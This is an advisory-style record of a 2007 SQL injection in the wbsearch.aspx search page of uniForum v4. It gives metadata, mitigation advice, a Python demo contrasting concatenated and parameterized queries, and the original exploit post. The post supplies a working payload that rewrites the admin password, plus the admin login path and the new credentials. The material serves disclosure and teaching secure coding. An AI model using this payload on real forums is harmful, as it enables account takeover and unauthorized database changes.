Vendor: uniForum
By: ajann
CVSS: 7.5 (HIGH)
Vulnerability type: Remote SQL Injection
CWE: 89
Product Name: uniForum
Affected Version From: unspecified
Affected Version To: 4
Patch Exists: NO
Related CWE:
CPE: uniforum
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

The wbsearch.aspx page of uniForum version 4 is vulnerable to remote SQL injection. The page passes user-supplied input into a database query without validating it, so an attacker who sends a specially crafted request to wbsearch.aspx can inject SQL into that query and read or modify data in the application's database without authorization.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of uniForum or apply a patch provided by the vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
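To make the mitigation concrete, here is an added example that is not uniForum code (the product is ASP.NET; this is a Python/SQLite model of the same pattern). It runs a search query built by string concatenation beside its parameterized form against a constructed in-memory database, using the payload from the Exploit-DB raw data below; sqlite3's executescript() stands in for a database server that executes stacked statements, which that payload relies on.

```python
import sqlite3

# Constructed stand-in for the forum database: an "admin" table with the column the
# advisory's payload targets, plus a posts table the search page would query.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE admin(Username TEXT, Password TEXT);
        INSERT INTO admin VALUES ('Administrator', 'original-secret');
        CREATE TABLE posts(author TEXT, body TEXT);
        INSERT INTO posts VALUES ('alice', 'hello'), ('bob', 'world');
    """)
    return con

def admin_password(con):
    # Used to observe whether a search request changed the admin credentials.
    return con.execute(
        "SELECT Password FROM admin WHERE Username = 'Administrator'").fetchone()[0]

# The advisory's payload as posted: closes the quoted search term, appends an
# UPDATE as a second statement, and comments out the rest of the original query.
PAYLOAD = "';update admin set Password='000245'--"

def search_by_user_vulnerable(con, user):
    """Concatenation: the 'by User' value becomes part of the SQL text.
    executescript() stands in for a server that runs stacked statements, which
    is what the payload relies on. Returns the SQL text that was executed."""
    sql = "SELECT author, body FROM posts WHERE author LIKE '%" + user + "%'"
    con.executescript(sql)
    return sql

def search_by_user_parameterized(con, user):
    """Hardened form: the value is bound as a parameter, so quotes and semicolons
    inside it are matched as data, never parsed as SQL. Returns matching rows."""
    return con.execute(
        "SELECT author, body FROM posts WHERE author LIKE '%' || ? || '%'",
        (user,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    print(search_by_user_vulnerable(con, PAYLOAD))
    print("admin password after concatenated query:", admin_password(con))  # 000245
    con = make_db()
    print(search_by_user_parameterized(con, PAYLOAD))                        # []
    print("admin password after parameterized query:", admin_password(con))
```

The first run shows the concatenated query carrying the injected UPDATE and the admin password changed; the parameterized run returns no rows and leaves the admin table untouched.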

Exploit-DB raw data:

*******************************************************************************
# Title   :  uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# Vendor  :  http://uniforum.biz/
# $$      :  $99

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

//Find the ->wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'--

Login Admin:http://www.xxx.com/[path]/wbadmlog.aspx
Username: Administrator
Password: 000245

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not Hacker!

# milw0rm.com [2007-01-09]